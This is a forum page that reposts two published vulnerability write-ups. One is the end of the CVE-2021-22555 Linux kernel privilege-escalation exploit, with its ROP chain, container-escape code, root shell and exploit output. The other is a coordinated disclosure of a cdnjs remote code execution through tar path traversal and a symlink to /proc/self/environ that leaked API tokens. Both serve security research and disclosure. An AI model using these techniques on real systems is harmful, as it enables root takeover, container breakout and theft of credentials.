anon_pipe_buf_ops basically allows us to calculate the kernel base address. We spray a lot of struct pipe_buffer objects and reclaim the location of the stale struct sk_buff data buffer: [Figure 9: Freed fake message reclaimed with a struct pipe_buffer] As we still have a reference from the struct sk_buff, we can read its data buffer, leak the content of struct pipe_buffer and reveal the address of anon_pipe_buf_ops: [+] anon_pipe_buf_ops: ffffffffa1e78380 [+] kbase_addr: ffffffffa0e00000 With this information, we can now find JOP/ROP gadgets. Note that when reading from the unix socket, we actually free its buffer as well: [Figure 10: Freed fake message reclaimed with a struct pipe_buffer] Escalating privileges We reclaim the stale struct pipe_buffer with a fake one with ops pointing to a fake struct pipe_buf_operations. This fake structure is planted at the same location since we know its address, and obviously, this structure should contain a malicious function pointer as release. [Figure 11: Freed struct pipe_buffer reclaimed with a fake struct pipe_buffer] The final stage of the exploit is to close all pipes in order to trigger the release which in turn will kick off the JOP chain. Finding JOP gadgets is hard, thus the goal is to achieve a kernel stack pivot as soon as possible in order to execute a kernel ROP chain. Kernel ROP chain We save the value of RBP at some scratchpad address in kernel so that we can later resume the execution, then we call commit_creds(prepare_kernel_cred(NULL)) to install kernel credentials and finally we call switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) to switch the namespace of process 1 to the one of the init process. After that, we restore the value of RBP and return to resume the execution (which will immediately make free_pipe_info() return). Escaping the container and popping a root shell Arriving back in userland, we now have root permissions to change mnt, pid and net namespaces to escape the container and break out of the kubernetes pod. Ultimately, we pop a root shell. setns(open("/proc/1/ns/mnt", O_RDONLY), 0); setns(open("/proc/1/ns/pid", O_RDONLY), 0); setns(open("/proc/1/ns/net", O_RDONLY), 0); char *args[] = {"/bin/bash", "-i", NULL}; execve(args[0], args, NULL); Proof-Of-Concept The Proof-Of-Concept is available at https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555. Executing it on a vulnerable machine will grant you root: theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c theflow@theflow:~$ ./exploit [+] Linux Privilege Escalation by theflow@ - 2021 [+] STAGE 0: Initialization [*] Setting up namespace sandbox... [*] Initializing sockets and message queues... [+] STAGE 1: Memory corruption [*] Spraying primary messages... [*] Spraying secondary messages... [*] Creating holes in primary messages... [*] Triggering out-of-bounds write... [*] Searching for corrupted primary message... [+] fake_idx: ffc [+] real_idx: fc4 [+] STAGE 2: SMAP bypass [*] Freeing real secondary message... [*] Spraying fake secondary messages... [*] Leaking adjacent secondary message... [+] kheap_addr: ffff91a49cb7f000 [*] Freeing fake secondary messages... [*] Spraying fake secondary messages... [*] Leaking primary message... [+] kheap_addr: ffff91a49c7a0000 [+] STAGE 3: KASLR bypass [*] Freeing fake secondary messages... [*] Spraying fake secondary messages... [*] Freeing sk_buff data buffer... [*] Spraying pipe_buffer objects... [*] Leaking and freeing pipe_buffer object... [+] anon_pipe_buf_ops: ffffffffa1e78380 [+] kbase_addr: ffffffffa0e00000 [+] STAGE 4: Kernel code execution [*] Spraying fake pipe_buffer objects... [*] Releasing pipe_buffer objects... [*] Checking for root... [+] Root privileges gained. [+] STAGE 5: Post-exploitation [*] Escaping container... [*] Cleaning up... [*] Popping root shell... root@theflow:/# id uid=0(root) gid=0(root) groups=0(root) root@theflow:/# Timeline 2021-04-06 - Vulnerability reported to security@kernel.org. 2021-04-13 - Patch merged upstream. 2021-07-07 - Public disclosure. Thanks Eduardo Vela Francis Perron Jann Horn Sursa: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
  14. Remote code execution in cdnjs of Cloudflare 2021-07-16 1891 字 cdnjs Vulnerability Go Supply Chain RCE Preface (日本語版も公開されています。) Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments. This article describes vulnerabilities reported through this program and published with the permission of the Cloudflare security team. So this article is not intended to recommend you to perform an unauthorized vulnerability assessment. If you found any vulnerabilities in Cloudflare’s product, please report it to Cloudflare’s vulnerability disclosure program. TL;DR There was a vulnerability in the cdnjs library update server that could execute arbitrary commands, and as a result, cdnjs could be completely compromised. This allows an attacker to tamper 12.7%1 of all websites on the internet once caches are expired. About cdnjs cdnjs is a JavaScript/CSS library CDN that is owned by Cloudflare, which is used by 12.7% of all websites on the internet as of 15 July 2021. This is the second most widely used library CDN after 12.8%2 of Google Hosted Libraries, and considering the current usage rate, it will be the most used JavaScript library CDN in the near future. Usage graph of cdnjs from W3Techs, as of 15 July 2021 Reason for investigation A few weeks before my last investigation into “Remote code execution in Homebrew by compromising the official Cask repository”, I was investigating supply chain attacks. While finding a service that many software depends on, and is allowing users to perform the vulnerability assessment, I found cdnjs. So I decided to investigate it. Initial investigation While browsing the cdnjs website, I found the following description. Couldn’t find the library you’re looking for? You can make a request to have it added on our GitHub repository. I found out that the library information is managed on the GitHub repository, so I checked the repositories of the GitHub Organization that is used by cdnjs. As a result, it was found that the repository is used in the following ways. cdnjs/packages: Stores library information that is supported in cdnjs cdnjs/cdnjs: Stores files of libraries cdnjs/logs: Stores update logs of libraries cdnjs/SRIs: Stores SRI (Subresource Integrity) of libraries cdnjs/static-website: Source code of cdnjs.com cdnjs/origin-worker: Cloudflare Worker for origin of cdnjs.cloudflare.com cdnjs/tools: cdnjs management tools cdnjs/bot-ansible: Ansible repository of the cdnjs library update server As you can see from these repositories, most of the cdnjs infrastructure is centralized in this GitHub Organization. I was interested in cdnjs/bot-ansible and cdnjs/tools because it automates library updates. After reading codes of these 2 repositories, it turned out cdnjs/bot-ansible executes autoupdate command of cdnjs/tools in the cdnjs library update server periodically, to check updates of library from cdnjs/packages by downloading npm package / Git repository. Investigation of automatic update The automatic update function updates the library by downloading the user-managed Git repository / npm package and copying the target file from them. And npm registry compress libraries into .tgz to make it downloadable. Since the tool for this automatic update is written in Go, I guessed that it may use Go’s compress/gzip and archive/tar to extract the archive file. Go’s archive/tar returns the filename contained in the archive without sanitizing3, so if the archive is extracted into the disk based on the filename returned from archive/tar, archives that contain filename like ../../../../../../../tmp/test may overwrite arbitrary files on the system. 4 From the information in cdnjs/bot-ansible, I knew that some scripts were running regularly and the user that runs the autoupdate command had write permission for them, so I focused on overwriting files via path traversal. Path traversal To find path traversal, I started reading the main function of the autoupdate command. func main() { [...] switch *pckg.Autoupdate.Source { case "npm": { util.Debugf(ctx, "running npm update") newVersionsToCommit, allVersions = updateNpm(ctx, pckg) } case "git": { util.Debugf(ctx, "running git update") newVersionsToCommit, allVersions = updateGit(ctx, pckg) } [...] } As you can see from the code snippet above, if npm is specified as a source of auto-update, it passes package information to the updateNpm function. func updateNpm(ctx context.Context, pckg *packages.Package) ([]newVersionToCommit, []version) { [...] newVersionsToCommit = doUpdateNpm(ctx, pckg, newNpmVersions) [...] } Then, updateNpm passes information about the new library version to doUpdateNpm function. func doUpdateNpm(ctx context.Context, pckg *packages.Package, versions []npm.Version) []newVersionToCommit { [...] for _, version := range versions { [...] tarballDir := npm.DownloadTar(ctx, version.Tarball) filesToCopy := pckg.NpmFilesFrom(tarballDir) [...] } And doUpdateNpm passes the URL of .tgz file into npm.DownloadTar. func DownloadTar(ctx context.Context, url string) string { dest, err := ioutil.TempDir("", "npmtarball") util.Check(err) util.Debugf(ctx, "download %s in %s", url, dest) resp, err := http.Get(url) util.Check(err) defer resp.Body.Close() util.Check(Untar(dest, resp.Body)) return dest } Finally, pass the .tgz file obtained using http.Get to the Untar function. func Untar(dst string, r io.Reader) error { gzr, err := gzip.NewReader(r) if err != nil { return err } defer gzr.Close() tr := tar.NewReader(gzr) for { header, err := tr.Next() [...] // the target location where the dir/file should be created target := filepath.Join(dst, removePackageDir(header.Name)) [...] // check the file type switch header.Typeflag { [...] // if it's a file create it case tar.TypeReg: { [...] f, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode)) [...] // copy over contents if _, err := io.Copy(f, tr); err != nil { return err } } } } } As I guessed, compress/gzip and archive/tar were used in Untar function to extract .tgz file. At first, I thought that it’s sanitizing the path in the removePackageDir function, but when I checked the contents of the function, I noticed that it’s just removing package/ from the path. From these code snippets, I confirmed that arbitrary code can be executed after performing path traversal from the .tgz file published to npm and overwriting the script that is executed regularly on the server. Demonstration of vulnerability Because Cloudflare is running a vulnerability disclosure program on HackerOne, it’s likely that HackerOne’s triage team won’t forward the report to Cloudflare unless it indicates that the vulnerability is actually exploitable. Therefore, I decided to do a demonstration to show that vulnerability can actually be exploited. The attack procedure is as follows. Publish the .tgz file that contains the crafted filename to the npm registry. Wait for the cdnjs library update server to process the crafted .tgz file. The contents of the file that is published in step 1 are written into a regularly executed script file and arbitrary command is executed. … and after writing the attack procedure into my notepad, for some reason, I started wondering how automatic updates based on the Git repository works. So, I read codes a bit before demonstrating the vulnerability, and it seemed that the symlinks aren’t considered when copying files from the Git repository. func MoveFile(sourcePath, destPath string) error { inputFile, err := os.Open(sourcePath) if err != nil { return fmt.Errorf("Couldn't open source file: %s", err) } outputFile, err := os.Create(destPath) if err != nil { inputFile.Close() return fmt.Errorf("Couldn't open dest file: %s", err) } defer outputFile.Close() _, err = io.Copy(outputFile, inputFile) inputFile.Close() if err != nil { return fmt.Errorf("Writing to output file failed: %s", err) } // The copy was successful, so now delete the original file err = os.Remove(sourcePath) if err != nil { return fmt.Errorf("Failed removing original file: %s", err) } return nil } As Git supports symbolic links by default, it may be possible to read arbitrary files from the cdnjs library update server by adding symlink into the Git repository. If the regularly executed script file is overwritten to execute arbitrary commands, the automatic update function may be broken, so I decided to check the arbitrary file reading first. Along with this, the attack procedure was changed as follows. Add a symbolic link that points harmless file (Assumed /proc/self/maps here) into the Git repository. Publish a new version in the repository. Wait for the cdnjs library update server to process the crafted repository. The specified file is published on cdnjs. It was around 20:00 at this point, but what I have to do was creating a symlink, so I decided to eat dinner after creating the symbolic link and publishing it.5 ln -s /proc/self/maps test.js Incident Once I finished the dinner and returning to my PC desk, I was able to confirm that cdnjs has released a version containing symbolic links. After checking the contents of the file to send the report, I was surprised. Surprisingly, clearly sensitive information such as GITHUB_REPO_API_KEY and WORKERS_KV_API_TOKEN was displayed. I couldn’t understand what happened for a moment, and when I checked the command log, I found that I accidentally put a link to /proc/self/environ instead of /proc/self/maps.6 As mentioned earlier, if cdnjs' GitHub Organization is compromised, it’s possible to compromise most of the cdnjs infrastructure. I needed to take immediate action, so I sent the report that only contains a link that shows the current situation, and requested them to revoke all credentials. At this point, I was very confused and hadn’t confirmed it, but in fact, these tokens were invalidated before I sent the report. It seems that GitHub notified Cloudflare immediately because GITHUB_REPO_API_KEY (API key of GitHub) was included in the repository, and Cloudflare started incident response immediately after the notification. I felt that they’re a great security team because they invalidated all credentials within minutes after cdnjs processed the specially crafted repository. Determinate impact After the incident, I investigated what could be impacted. GITHUB_REPO_API_KEY was an API key for robocdnjs, which belongs to cdnjs organization, and had write permission against each repository. This means it was possible to tamper arbitrary libraries on the cdnjs or tamper the cdnjs.com itself. Also, WORKERS_KV_API_TOKEN had permission against KV of Cloudflare Workers that is used in the cdnjs, it could be used to tamper the libraries on the KV cache. By combining these permissions, the core part of cdnjs, such as the origin data of cdnjs, the KV cache, and even the cdnjs website, could be completely tampered. Conclusion In this article, I described the vulnerability that was existed in cdnjs. While this vulnerability could be exploited without any special skills, it could impact many websites. Given that there are many vulnerabilities in the supply chain, which are easy to exploit but have a large impact, I feel that it’s very scary. If you have any questions/comments about this article, please send a message to @ryotkak on Twitter. Timeline Date (JST) Event April 6, 2021 19:00 Found a vulnerability April 6, 2021 20:00 Published a crafted symlink April 6, 2021 20:30 cdnjs processed the file At the same time GitHub sent an alert to Cloudflare At the same time Cloudflare started an incident response Within minutes Cloudflare finished revocation of credentials April 6, 2021 20:40 I sent an initial report April 6, 2021 21:00 I sent detailed report April 7, 2021- Secondary fix has applied June 3, 2021 Complete fix has applied July 16, 2021 Published this article Quoted from W3Techs as of 15 July 2021. Due to the presence of SRI / cache, fewer websites could tamper immediately. ↩︎ Quoted from W3Techs as of 15 July 2021. ↩︎ https://github.com/golang/go/issues/25849 ↩︎ Archives like this can be created by using tools such as evilarc. ↩︎ I don’t know if this is correct, but I remember that the dinner on that day was frozen gyoza (dumplings). (It was yummy!) ↩︎ Because I was tired from work and I was hungry, I ran the command completed by shell without any confirmation. ↩︎ Sursa: https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
×
×
  • Create New...